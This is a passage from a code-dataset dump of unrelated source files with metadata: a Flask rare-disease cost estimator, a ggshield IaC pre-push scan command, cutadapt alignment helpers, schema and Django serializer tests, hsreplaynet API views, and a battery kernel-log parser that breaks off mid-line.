db.Column(db.Float(2 ,2), nullable=False)\r\n medicine_cost_factor = db.Column(db.Float(2, 2), nullable=False)\r\n therapy_cost_factor1 = db.Column(db.Float(2, 2), nullable=False)\r\n medicine_cost_factor1 = db.Column(db.Float(2, 2), nullable=False)\r\n therapy_cost_factor2 = db.Column(db.Float(2, 2), nullable=False)\r\n medicine_cost_factor2 = db.Column(db.Float(2, 2), nullable=False)\r\n therapy_cost_factor3 = db.Column(db.Float(2, 2), nullable=False)\r\n medicine_cost_factor3 = db.Column(db.Float(2, 2), nullable=False)\r\n def __init__(self,location_name):\r\n self.location_name = location_name\r\n def __rept__(self):\r\n return '' % self.location_name\r\n\r\nclass Medicine_req(db.Model):\r\n id = db.Column(db.Integer, primary_key=True)\r\n d_id = db.Column(db.Integer, db.ForeignKey('disease.id'), nullable=False)\r\n m_id = db.Column(db.Integer, db.ForeignKey('medicine.id'), nullable=False)\r\n m_req = db.Column(db.Integer, nullable=False)\r\n m_req1 = db.Column(db.Integer, nullable=False)\r\n m_req2 = db.Column(db.Integer, nullable=False)\r\n m_req3 = db.Column(db.Integer, nullable=False)\r\n medicine_req_desc = db.Column(db.Text)\r\n\r\nclass Therapist_req(db.Model):\r\n id = db.Column(db.Integer, primary_key=True)\r\n d_id = db.Column(db.Integer, db.ForeignKey('disease.id'), nullable=False)\r\n t_id = db.Column(db.Integer, db.ForeignKey('therapist.id'), nullable=False)\r\n t_req = db.Column(db.Integer, nullable=False)\r\n t_req1 = db.Column(db.Integer, nullable=False)\r\n t_req2 = db.Column(db.Integer, nullable=False)\r\n t_req3 = db.Column(db.Integer, nullable=False)\r\n therapy_req_desc = db.Column(db.Text)\r\n\r\n\r\n### For index page\r\n@app.route('/')\r\ndef index():\r\n diseases = Disease.query.all()\r\n return render_template(\"index.html\", disease=diseases)\r\n\r\n### For query page\r\n@app.route('/query', methods=['POST'])\r\ndef query():\r\n location = Location.query.all()\r\n stage = request.form['stage']\r\n disease = request.form['diagnosis']\r\n diseaseObj = Disease.query.filter(Disease.disease_name == disease).first()\r\n links = diseaseObj.disease_links\r\n print(diseaseObj.disease_name)\r\n if stage == 'Newly Diagnosed':\r\n desciption = diseaseObj.disease_desc_new\r\n stage = 'new'\r\n else:\r\n 
desciption = diseaseObj.disease_desc_old\r\n stage = 'old'\r\n return render_template(\"query.html\",state = location, disease=disease, stage=stage, desc = desciption, links=links)\r\n\r\n### For result page\r\n@app.route('/result',methods=['POST'])\r\ndef result():\r\n ### Getting data from query form\r\n name=request.form['name']\r\n age = request.form['age']\r\n state = request.form['option']\r\n salary = request.form['salary']\r\n stage = request.form['stage']\r\n disease = request.form['disease']\r\n locationObj = Location.query.filter(Location.location_name == state).first()\r\n\r\n ### Getting cost factors from locations table\r\n\r\n ### Annual\r\n tcf = (locationObj.therapy_cost_factor)\r\n mcf = (locationObj.medicine_cost_factor)\r\n\r\n ### Year2\r\n tcf1 = (locationObj.therapy_cost_factor1)\r\n mcf1 = (locationObj.medicine_cost_factor1)\r\n ### Year3\r\n tcf2 = (locationObj.therapy_cost_factor2)\r\n mcf2 = (locationObj.medicine_cost_factor2)\r\n ### Year4\r\n tcf3 = (locationObj.therapy_cost_factor3)\r\n mcf3 = (locationObj.medicine_cost_factor3)\r\n\r\n ### Get medicine and therapy requirements for the disease selected\r\n disease_id = Disease.query.filter(Disease.disease_name == disease).first().id\r\n\r\n medicine_req = Medicine_req.query.filter(Medicine_req.d_id == disease_id).all()\r\n medicines = []\r\n medicine_units_annual = []\r\n medicine_units_year1 = []\r\n medicine_units_year2 = []\r\n medicine_units_year3 = []\r\n medicine_desc = []\r\n therapy_desc = []\r\n\r\n for medicine in medicine_req:\r\n medicine_units_annual.append(medicine.m_req)\r\n medicine_units_year1.append(medicine.m_req1)\r\n medicine_units_year2.append(medicine.m_req2)\r\n medicine_units_year3.append(medicine.m_req3)\r\n medicines.append(Medicine.query.filter(Medicine.id == medicine.m_id).first())\r\n medicine_desc.append(medicine.medicine_req_desc)\r\n\r\n therapy_req = Therapist_req.query.filter(Therapist_req.d_id == disease_id).all()\r\n therapies = []\r\n therapy_sessions_annual = []\r\n therapy_sessions_year1 = []\r\n therapy_sessions_year2 = []\r\n therapy_sessions_year3 = []\r\n for therapy in therapy_req:\r\n therapist = Therapist.query.filter(Therapist.id == therapy.t_id).first()\r\n if therapist.therapist_name == 'Pediatrician' and int(age) > 18:\r\n continue\r\n therapy_sessions_annual.append(therapy.t_req)\r\n therapy_sessions_year1.append(therapy.t_req1)\r\n therapy_sessions_year2.append(therapy.t_req2)\r\n therapy_sessions_year3.append(therapy.t_req3)\r\n therapies.append(therapist)\r\n therapy_desc.append(therapy.therapy_req_desc)\r\n\r\n ### Get the cost for medicine and therapy for the disease\r\n annual_medicine_cost = 0\r\n year1_medicine_cost = 0\r\n year2_medicine_cost = 0\r\n year3_medicine_cost = 0\r\n annual_therapy_cost = 0\r\n year1_therapy_cost = 0\r\n year2_therapy_cost = 0\r\n year3_therapy_cost = 0\r\n for i in range(len(medicines)):\r\n unit_cost = medicines[i].cost_per_unit\r\n annual_medicine_cost += unit_cost * mcf * medicine_units_annual[i]\r\n year1_medicine_cost += unit_cost * mcf1 * medicine_units_year1[i]\r\n year2_medicine_cost += unit_cost * mcf2 * medicine_units_year2[i]\r\n year3_medicine_cost += unit_cost * mcf3 * medicine_units_year3[i]\r\n\r\n hours_for_therapy = 0\r\n for i in range(len(therapies)):\r\n session_cost = therapies[i].cost_per_session\r\n hours_for_therapy += therapy_sessions_annual[i]\r\n annual_therapy_cost += session_cost * tcf * therapy_sessions_annual[i]\r\n year1_therapy_cost += session_cost * tcf1 * therapy_sessions_year1[i]\r\n 
year2_therapy_cost += session_cost * tcf2 * therapy_sessions_year2[i]\r\n year3_therapy_cost += session_cost * tcf3 * therapy_sessions_year3[i]\r\n\r\n ### Data for prediction chart\r\n therapy_cost_pred=[int(year1_therapy_cost),int(year2_therapy_cost),int(year3_therapy_cost)]\r\n medicine_cost_pred = [int(year1_medicine_cost), int(year2_medicine_cost), int(year3_medicine_cost)]\r\n\r\n ###Lost opportunity\r\n lost_opportunity = int(int(salary) / 2080 * hours_for_therapy)\r\n\r\n return render_template('result.html', disease = disease, therapies = therapies, medicines = medicines, medicine_data_annual=[int(annual_medicine_cost)], medicine_data_pred=medicine_cost_pred,\r\n therapy_data_annual=[int(annual_therapy_cost)],therapy_data_pred=therapy_cost_pred,\r\n hours_for_therapy=hours_for_therapy,salary=salary,lost_opportunity=lost_opportunity, medicine_desc=enumerate(medicine_desc), therapy_desc=enumerate(therapy_desc),\r\n medicine_desc_comp=enumerate(medicine_desc), therapy_desc_comp=enumerate(therapy_desc))\r\n\r\nif(__name__ == \"__main__\"):\r\n app.run(debug=True)\r\n\r\n", "sub_path": "RareDisease/app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 8840, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "flask.Flask", "line_number": 4, "usage_type": "call"}, {"api_name": "flask_sqlalchemy.SQLAlchemy", "line_number": 6, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 82, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 88, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 88, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 89, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 89, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 99, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 105, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 105, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 106, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 106, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 107, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 107, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 108, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 108, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 109, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 109, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 110, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 110, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 198, "usage_type": "call"}]} +{"seq_id": "93038984", "text": "from pathlib import Path\nfrom typing import Any, List, Sequence\n\nimport click\n\nfrom ggshield.cmd.iac.scan.all import display_iac_scan_all_result, iac_scan_all\nfrom ggshield.cmd.iac.scan.diff import display_iac_scan_diff_result, iac_scan_diff\nfrom ggshield.cmd.iac.scan.iac_scan_common_options import (\n add_iac_scan_common_options,\n update_context,\n)\nfrom ggshield.cmd.utils.common_options import all_option\nfrom ggshield.core.config import Config\nfrom ggshield.core.errors import handle_exception\nfrom ggshield.core.git_hooks.prepush import 
collect_commits_refs\nfrom ggshield.core.text_utils import display_warning\nfrom ggshield.utils.git_shell import EMPTY_SHA\n\n\n@click.command()\n@click.argument(\"prepush_args\", nargs=-1, type=click.UNPROCESSED)\n@add_iac_scan_common_options()\n@all_option\n@click.pass_context\ndef scan_pre_push_cmd(\n ctx: click.Context,\n prepush_args: List[str],\n exit_zero: bool,\n minimum_severity: str,\n ignore_policies: Sequence[str],\n ignore_paths: Sequence[str],\n scan_all: bool,\n **kwargs: Any,\n) -> int:\n \"\"\"\n Scan as pre-push for IaC vulnerabilities. By default, it will return vulnerabilities added in the pushed commits.\n \"\"\"\n display_warning(\n \"This feature is still in beta, its behavior may change in future versions.\"\n )\n\n try:\n directory = Path().resolve()\n update_context(ctx, exit_zero, minimum_severity, ignore_policies, ignore_paths)\n\n _, remote_commit = collect_commits_refs(prepush_args)\n # Will happen if this is the first push on the branch\n has_no_remote_commit = (\n remote_commit is None or \"~1\" in remote_commit or remote_commit == EMPTY_SHA\n )\n\n if scan_all or has_no_remote_commit:\n result = iac_scan_all(ctx, directory)\n return display_iac_scan_all_result(ctx, directory, result)\n else:\n result = iac_scan_diff(ctx, directory, remote_commit, include_staged=False)\n return display_iac_scan_diff_result(ctx, directory, result)\n except Exception as error:\n config: Config = ctx.obj[\"config\"]\n return handle_exception(error, config.user_config.verbose)\n", "sub_path": "ggshield/cmd/iac/scan/prepush.py", "file_name": "prepush.py", "file_ext": "py", "file_size_in_byte": 2179, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "click.Context", "line_number": 26, "usage_type": "attribute"}, {"api_name": "typing.List", "line_number": 27, "usage_type": "name"}, {"api_name": "typing.Sequence", "line_number": 30, "usage_type": "name"}, {"api_name": "typing.Sequence", "line_number": 31, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 33, "usage_type": "name"}, {"api_name": "ggshield.core.text_utils.display_warning", "line_number": 38, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 43, "usage_type": "call"}, {"api_name": "ggshield.cmd.iac.scan.iac_scan_common_options.update_context", "line_number": 44, "usage_type": "call"}, {"api_name": "ggshield.core.git_hooks.prepush.collect_commits_refs", "line_number": 46, "usage_type": "call"}, {"api_name": "ggshield.utils.git_shell.EMPTY_SHA", "line_number": 49, "usage_type": "name"}, {"api_name": "ggshield.cmd.iac.scan.all.iac_scan_all", "line_number": 53, "usage_type": "call"}, {"api_name": "ggshield.cmd.iac.scan.all.display_iac_scan_all_result", "line_number": 54, "usage_type": "call"}, {"api_name": "ggshield.cmd.iac.scan.diff.iac_scan_diff", "line_number": 56, "usage_type": "call"}, {"api_name": "ggshield.cmd.iac.scan.diff.display_iac_scan_diff_result", "line_number": 57, "usage_type": "call"}, {"api_name": "ggshield.core.config.Config", "line_number": 59, "usage_type": "name"}, {"api_name": "ggshield.core.errors.handle_exception", "line_number": 60, "usage_type": "call"}, {"api_name": "click.command", "line_number": 20, "usage_type": "call"}, {"api_name": "click.argument", "line_number": 21, "usage_type": "call"}, {"api_name": "click.UNPROCESSED", "line_number": 21, "usage_type": "attribute"}, {"api_name": "ggshield.cmd.iac.scan.iac_scan_common_options.add_iac_scan_common_options", "line_number": 22, 
"usage_type": "call"}, {"api_name": "ggshield.cmd.utils.common_options.all_option", "line_number": 23, "usage_type": "name"}, {"api_name": "click.pass_context", "line_number": 24, "usage_type": "attribute"}]} +{"seq_id": "180875557", "text": "__all__ = [\n 'Aligner',\n 'compare_prefixes',\n 'compare_suffixes',\n]\n\nfrom cutadapt._align import Aligner, compare_prefixes\n\n# flags for global alignment\n\n# The interpretation of the first flag is:\n# An initial portion of seq1 may be skipped at no cost.\n# This is equivalent to saying that in the alignment,\n# gaps in the beginning of seq2 are free.\n#\n# The other flags have an equivalent meaning.\nSTART_WITHIN_SEQ1 = 1\nSTART_WITHIN_SEQ2 = 2\nSTOP_WITHIN_SEQ1 = 4\nSTOP_WITHIN_SEQ2 = 8\n\n# Use this to get regular semiglobal alignment\n# (all gaps in the beginning or end are free)\nSEMIGLOBAL = START_WITHIN_SEQ1 | START_WITHIN_SEQ2 | STOP_WITHIN_SEQ1 | STOP_WITHIN_SEQ2\n\n\ndef compare_suffixes(s1, s2, wildcard_ref=False, wildcard_query=False):\n \"\"\"\n Find out whether one string is the suffix of the other one, allowing\n mismatches. Used to find an anchored 3' adapter when no indels are allowed.\n \"\"\"\n s1 = s1[::-1]\n s2 = s2[::-1]\n _, length, _, _, matches, errors = compare_prefixes(s1, s2, wildcard_ref, wildcard_query)\n return (len(s1) - length, len(s1), len(s2) - length, len(s2), matches, errors)\n\n\n# convenience function (to avoid having to instantiate an Aligner manually)\ndef locate(reference, query, max_error_rate, flags=SEMIGLOBAL, wildcard_ref=False,\n wildcard_query=False, min_overlap=1):\n aligner = Aligner(reference, max_error_rate, flags, wildcard_ref, wildcard_query)\n aligner.min_overlap = min_overlap\n return aligner.locate(query)\n", "sub_path": "src/cutadapt/align.py", "file_name": "align.py", "file_ext": "py", "file_size_in_byte": 1495, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "cutadapt._align.compare_prefixes", "line_number": 34, "usage_type": "call"}, {"api_name": "cutadapt._align.Aligner", "line_number": 41, "usage_type": "call"}]} +{"seq_id": "380089785", "text": "# Copyright © 2019 Province of British Columbia\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"Test Suite to ensure legal filing schemas are valid.\n\nThis suite should have at least 1 test for every filing type allowed.\n\"\"\"\nimport copy\n\nimport pytest\n\nfrom registry_schemas import validate\nfrom registry_schemas.example_data import ADDRESS\n\n\ndef test_valid_address():\n \"\"\"Assert that the schema is performing as expected.\"\"\"\n is_valid, errors = validate(ADDRESS, 'address')\n\n if errors:\n for err in errors:\n print(err.message)\n print(errors)\n\n assert is_valid\n\n\ndef test_valid_address_null_region():\n \"\"\"Assert that region is allowed to be null.\"\"\"\n address = copy.deepcopy(ADDRESS)\n address['addressRegion'] = None\n\n is_valid, errors = validate(address, 'address')\n\n if errors:\n for err in errors:\n print(err.message)\n 
print(errors)\n\n assert is_valid\n\n\ndef test_invalid_address():\n \"\"\"Assert that an invalid address fails.\"\"\"\n address = copy.deepcopy(ADDRESS)\n address['streetAddress'] = 'This is a really long string, over the 50 char maximum'\n\n is_valid, errors = validate(address, 'address')\n\n if errors:\n for err in errors:\n print(err.message)\n print(errors)\n\n assert not is_valid\n\n\n@pytest.mark.parametrize('field', [\n 'streetAddress',\n 'addressCity',\n 'addressCountry',\n 'postalCode'\n])\ndef test_invalid_address_missing_field(field):\n \"\"\"Assert that an invalid address fails - missing required field addressRegion.\"\"\"\n address = copy.deepcopy(ADDRESS)\n del address[field]\n\n is_valid, errors = validate(address, 'address')\n\n if errors:\n for err in errors:\n print(err.message)\n print(errors)\n\n assert not is_valid\n", "sub_path": "tests/unit/test_addresses.py", "file_name": "test_addresses.py", "file_ext": "py", "file_size_in_byte": 2283, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "registry_schemas.validate", "line_number": 28, "usage_type": "call"}, {"api_name": "registry_schemas.example_data.ADDRESS", "line_number": 28, "usage_type": "argument"}, {"api_name": "copy.deepcopy", "line_number": 40, "usage_type": "call"}, {"api_name": "registry_schemas.example_data.ADDRESS", "line_number": 40, "usage_type": "argument"}, {"api_name": "registry_schemas.validate", "line_number": 43, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 55, "usage_type": "call"}, {"api_name": "registry_schemas.example_data.ADDRESS", "line_number": 55, "usage_type": "argument"}, {"api_name": "registry_schemas.validate", "line_number": 58, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 76, "usage_type": "call"}, {"api_name": "registry_schemas.example_data.ADDRESS", "line_number": 76, "usage_type": "argument"}, {"api_name": "registry_schemas.validate", "line_number": 79, "usage_type": "call"}, {"api_name": "pytest.mark.parametrize", "line_number": 68, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 68, "usage_type": "attribute"}]} +{"seq_id": "169683960", "text": "from django.test import TestCase\nfrom .models import *\nfrom .serializers import *\n\nclass Recommendation(TestCase):\n\n\tdef setUp(self):\n\t\tself.r_attr = {\n\t\t\t\"label\": \"test_tag\",\n\t\t\t\"description\": \"Tag for unit test\"\n\t\t}\n\n\t\tself.r_comp = Tag.objects.create(**self.r_attr)\n\t\tself.serializer = TagSerializer(instance=self.r_comp, data=self.r_attr)\n\n\tdef test_text_component(self):\n\t\tself.assertTrue(self.serializer.is_valid())\t\t\n\t\tdata = self.serializer.validated_data\n\t\t\n\t\tself.assertEqual(set(data.keys()), set([\"label\", \"description\"]))\n\t\tself.assertEqual(data[\"label\"], self.r_attr[\"label\"])\n\t\tself.assertEqual(data[\"description\"], self.r_attr[\"description\"])\n\n\tdef test_create_and_update_tag(self):\n\t\tself.assertTrue(self.serializer.is_valid())\t\t\n\t\tdata = self.serializer.validated_data\n\t\tdata[\"label\"] = \"new_tag\"\n\t\ttemp = self.serializer.create(data)\n\t\tself.assertEqual(temp.label, \"new_tag\")\n\t\tself.assertEqual(temp.description, self.r_attr[\"description\"])\n\n\t\tself.serializer = TagSerializer(instance=temp, data={\"label\": \"new_tag\", \"description\": \"tag for testing\"})\n\t\tself.assertTrue(self.serializer.is_valid())\t\t\n\t\tdata = self.serializer.validated_data\n\t\ttemp = self.serializer.update(temp, 
data)\n\t\tself.assertEqual(temp.label, \"new_tag\")\n\t\tself.assertEqual(temp.description, \"tag for testing\")\n", "sub_path": "backend-app/interesthub/recommendation/tests.py", "file_name": "tests.py", "file_ext": "py", "file_size_in_byte": 1301, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "django.test.TestCase", "line_number": 5, "usage_type": "name"}]} +{"seq_id": "455294370", "text": "from rest_framework.authentication import SessionAuthentication\nfrom rest_framework.mixins import CreateModelMixin, UpdateModelMixin, RetrieveModelMixin\nfrom rest_framework.generics import CreateAPIView, ListAPIView, RetrieveUpdateDestroyAPIView\nfrom rest_framework.permissions import AllowAny\nfrom rest_framework.response import Response\nfrom rest_framework.viewsets import GenericViewSet\nfrom rest_framework.status import HTTP_201_CREATED\nfrom hsreplaynet.accounts.models import AccountClaim\nfrom hsreplaynet.games.models import GameReplay\nfrom hsreplaynet.uploads.models import UploadEvent\nfrom . import serializers\nfrom .authentication import AuthTokenAuthentication, RequireAuthToken\nfrom .models import AuthToken, APIKey\nfrom .permissions import APIKeyPermission, IsOwnerOrReadOnly\n\n\nclass WriteOnlyOnceViewSet(\n\tCreateModelMixin, UpdateModelMixin, RetrieveModelMixin, GenericViewSet\n):\n\tpass\n\n\nclass AuthTokenViewSet(WriteOnlyOnceViewSet):\n\tpermission_classes = (APIKeyPermission, )\n\tqueryset = AuthToken.objects.all()\n\tserializer_class = serializers.AuthTokenSerializer\n\n\nclass APIKeyViewSet(WriteOnlyOnceViewSet):\n\tpermission_classes = (AllowAny, )\n\tqueryset = APIKey.objects.all()\n\tserializer_class = serializers.APIKeySerializer\n\n\nclass CreateAccountClaimView(CreateAPIView):\n\tauthentication_classes = (AuthTokenAuthentication, )\n\tpermission_classes = (RequireAuthToken, )\n\tqueryset = AccountClaim.objects.all()\n\tserializer_class = serializers.AccountClaimSerializer\n\n\tdef create(self, request):\n\t\tclaim, _ = AccountClaim.objects.get_or_create(token=request.auth_token)\n\t\tserializer = self.get_serializer(claim)\n\t\theaders = self.get_success_headers(serializer.data)\n\t\tresponse = Response(serializer.data, status=HTTP_201_CREATED, headers=headers)\n\t\treturn response\n\n\nclass UploadEventViewSet(WriteOnlyOnceViewSet):\n\tauthentication_classes = (AuthTokenAuthentication, SessionAuthentication)\n\tpermission_classes = (RequireAuthToken, APIKeyPermission)\n\tqueryset = UploadEvent.objects.all()\n\tserializer_class = serializers.UploadEventSerializer\n\tlookup_field = \"shortid\"\n\n\nclass GameReplayDetail(RetrieveUpdateDestroyAPIView):\n\tqueryset = GameReplay.objects.live()\n\tserializer_class = serializers.GameReplaySerializer\n\tlookup_field = \"shortid\"\n\tpermission_classes = (IsOwnerOrReadOnly, )\n\n\tdef perform_destroy(self, instance):\n\t\tinstance.is_deleted = True\n\t\tinstance.save()\n\n\nclass GameReplayList(ListAPIView):\n\tqueryset = GameReplay.objects.live().prefetch_related(\"user\", \"global_game__players\")\n\tserializer_class = serializers.GameReplayListSerializer\n\n\tdef check_permissions(self, request):\n\t\tif not request.user.is_authenticated:\n\t\t\tself.permission_denied(request)\n\t\treturn super().check_permissions(request)\n\n\tdef get_queryset(self):\n\t\tqueryset = super().get_queryset()\n\t\tuser = self.request.user\n\t\tif not user.is_staff:\n\t\t\t# For non-staff, only own games are visible\n\t\t\tqueryset = queryset.filter(user=user)\n\t\t# 
Allow filtering on username key\n\t\tusername = self.request.query_params.get(\"username\", None)\n\t\tif username:\n\t\t\tqueryset = queryset.filter(user__username=username)\n\t\treturn queryset\n", "sub_path": "hsreplaynet/api/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 3107, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "rest_framework.mixins.CreateModelMixin", "line_number": 18, "usage_type": "name"}, {"api_name": "rest_framework.mixins.UpdateModelMixin", "line_number": 18, "usage_type": "name"}, {"api_name": "rest_framework.mixins.RetrieveModelMixin", "line_number": 18, "usage_type": "name"}, {"api_name": "rest_framework.viewsets.GenericViewSet", "line_number": 18, "usage_type": "name"}, {"api_name": "permissions.APIKeyPermission", "line_number": 24, "usage_type": "name"}, {"api_name": "models.AuthToken.objects.all", "line_number": 25, "usage_type": "call"}, {"api_name": "models.AuthToken.objects", "line_number": 25, "usage_type": "attribute"}, {"api_name": "models.AuthToken", "line_number": 25, "usage_type": "name"}, {"api_name": "rest_framework.permissions.AllowAny", "line_number": 30, "usage_type": "name"}, {"api_name": "models.APIKey.objects.all", "line_number": 31, "usage_type": "call"}, {"api_name": "models.APIKey.objects", "line_number": 31, "usage_type": "attribute"}, {"api_name": "models.APIKey", "line_number": 31, "usage_type": "name"}, {"api_name": "rest_framework.generics.CreateAPIView", "line_number": 35, "usage_type": "name"}, {"api_name": "authentication.AuthTokenAuthentication", "line_number": 36, "usage_type": "name"}, {"api_name": "authentication.RequireAuthToken", "line_number": 37, "usage_type": "name"}, {"api_name": "hsreplaynet.accounts.models.AccountClaim.objects.all", "line_number": 38, "usage_type": "call"}, {"api_name": "hsreplaynet.accounts.models.AccountClaim.objects", "line_number": 38, "usage_type": "attribute"}, {"api_name": "hsreplaynet.accounts.models.AccountClaim", "line_number": 38, "usage_type": "name"}, {"api_name": "hsreplaynet.accounts.models.AccountClaim.objects.get_or_create", "line_number": 42, "usage_type": "call"}, {"api_name": "hsreplaynet.accounts.models.AccountClaim.objects", "line_number": 42, "usage_type": "attribute"}, {"api_name": "hsreplaynet.accounts.models.AccountClaim", "line_number": 42, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 45, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_201_CREATED", "line_number": 45, "usage_type": "name"}, {"api_name": "authentication.AuthTokenAuthentication", "line_number": 50, "usage_type": "name"}, {"api_name": "rest_framework.authentication.SessionAuthentication", "line_number": 50, "usage_type": "name"}, {"api_name": "authentication.RequireAuthToken", "line_number": 51, "usage_type": "name"}, {"api_name": "permissions.APIKeyPermission", "line_number": 51, "usage_type": "name"}, {"api_name": "hsreplaynet.uploads.models.UploadEvent.objects.all", "line_number": 52, "usage_type": "call"}, {"api_name": "hsreplaynet.uploads.models.UploadEvent.objects", "line_number": 52, "usage_type": "attribute"}, {"api_name": "hsreplaynet.uploads.models.UploadEvent", "line_number": 52, "usage_type": "name"}, {"api_name": "rest_framework.generics.RetrieveUpdateDestroyAPIView", "line_number": 57, "usage_type": "name"}, {"api_name": "hsreplaynet.games.models.GameReplay.objects.live", "line_number": 58, "usage_type": "call"}, {"api_name": 
"hsreplaynet.games.models.GameReplay.objects", "line_number": 58, "usage_type": "attribute"}, {"api_name": "hsreplaynet.games.models.GameReplay", "line_number": 58, "usage_type": "name"}, {"api_name": "permissions.IsOwnerOrReadOnly", "line_number": 61, "usage_type": "name"}, {"api_name": "rest_framework.generics.ListAPIView", "line_number": 68, "usage_type": "name"}, {"api_name": "hsreplaynet.games.models.GameReplay.objects.live", "line_number": 69, "usage_type": "call"}, {"api_name": "hsreplaynet.games.models.GameReplay.objects", "line_number": 69, "usage_type": "attribute"}, {"api_name": "hsreplaynet.games.models.GameReplay", "line_number": 69, "usage_type": "name"}]} +{"seq_id": "265605663", "text": "# 这是一个示例 Python 脚本。\n\n# 按 Shift+F10 执行或将其替换为您的代码。\n# 按 按两次 Shift 在所有地方搜索类、文件、工具窗口、操作和设置。\nimport os\nimport sys\nimport time\nimport re\nfrom datetime import datetime\n\ndebug_verbose = 0\ndebug = 1\n\n\nclass Log_Parser_Template:\n def __init__(self,\n file_name_regular,\n file_name_sort_lambda,\n file_name_output,\n keyword_line_regular,\n keyword_field_regulart,\n keyword_time_regulart,\n keyword_head_regulart,\n keyword_field_split):\n self.file_name_regular = file_name_regular\n self.file_name_sort_lambda = file_name_sort_lambda\n self.file_name_output = file_name_output\n self.keyword_line_regular = keyword_line_regular\n self.keyword_field_regulart = keyword_field_regulart\n self.keyword_time_regulart = keyword_time_regulart\n self.keyword_head_regulart = keyword_head_regulart\n self.keyword_field_split = keyword_field_split\n\n\nLog_Parser_UNISOC = Log_Parser_Template(\n # 0-kernel.log\n file_name_regular='^\\d-kernel\\.log$',\n file_name_sort_lambda=(lambda x: int(x[0:1])),\n file_name_output='unisoc_battery.csv',\n # 5A245 <6> [27634.217721][12-02 20:18:22.217] charger-manager charger-manager: battery voltage = 3411000, OCV = 3536769, current = -1113000, capacity = 10, charger status = 2, force set full = 0, charging current = 0, charging limit current = 0, battery temperature = 513,board temperature = 583, track state = 1, charger type = 2, thm_adjust_cur = -22, charger input voltage = 0\n keyword_line_regular='.* charger-manager charger-manager:(.*)$',\n keyword_head_regulart='.* charger-manager charger-manager: battery voltage = (.*)$',\n keyword_field_regulart='(.+?)=(.+?),',\n keyword_field_split=',',\n keyword_time_regulart='^.*?\\[.*\\]\\[(.*)\\] ',\n)\n\nLog_Parsers = [Log_Parser_UNISOC]\n\n\nclass CsvItem:\n head_keyword_keypairs = {}\n\n def __init__(self):\n self.time = ''\n self.timestamp = 0.0\n self.keyword_keypairs = {}\n self.raw = ''\n self.file = ''\n self.line_number = -1\n self.head = False\n\n def dump(self):\n if len(self.time) > 0:\n print(\"time :\", self.time)\n if self.timestamp > 0:\n print(\"timestamp :\", self.timestamp)\n if len(self.keyword_keypairs) > 0:\n print(\"keypairs :\", self.keyword_keypairs)\n if len(self.raw) > 0:\n print(\"raw :\", self.raw)\n if len(self.file) > 0:\n print(\"file :\", self.file)\n if self.line_number != -1:\n print(\"line_number :\", self.line_number)\n\n @staticmethod\n def get_csv_head():\n return \",\".join([\"time\",\n \"timestamp\",\n \",\".join(list(CsvItem.head_keyword_keypairs.keys())),\n \"file\",\n \"line_number\", ])\n\n @staticmethod\n def update_head_keyword_keypairs(keys):\n for key in keys:\n if key not in CsvItem.head_keyword_keypairs:\n CsvItem.head_keyword_keypairs[key] = ''\n\n def get_csv_head_vales(self):\n values = \"\"\n for key in CsvItem.head_keyword_keypairs.keys():\n if key in 
self.keyword_keypairs:\n values = values + \",\" + self.keyword_keypairs[key]\n else:\n values = values + \",\"\n return values[1:] # remove the first ','\n\n def get_csv_line(self):\n return \",\".join([self.time,\n str(self.timestamp),\n self.get_csv_head_vales(),\n self.file,\n str(self.line_number), ])\n\n\ndef process_log_line(line, keyword_time_regulart, keyword_line_regular, keyword_field_regulart,keyword_field_split, keyword_head_regulart):\n line = line.replace('\\n', '').replace('\\r', '') # remove CR/LF first\n line_match_obj = re.match(keyword_line_regular, line)\n keyword_head_match_obj = re.match(keyword_head_regulart, line)\n\n if line_match_obj is not None:\n # we found a match\n item = CsvItem()\n if debug:\n print(\"keyword line :\", line)\n if keyword_head_match_obj is not None:\n item.head = True # this is a head item\n item.raw = line\n # 10-19 18:54:29.010\n time_matchObj = re.match(keyword_time_regulart, line)\n item.time = time_matchObj.group(1)\n if debug_verbose:\n print(\"time str:\", item.time)\n dt = 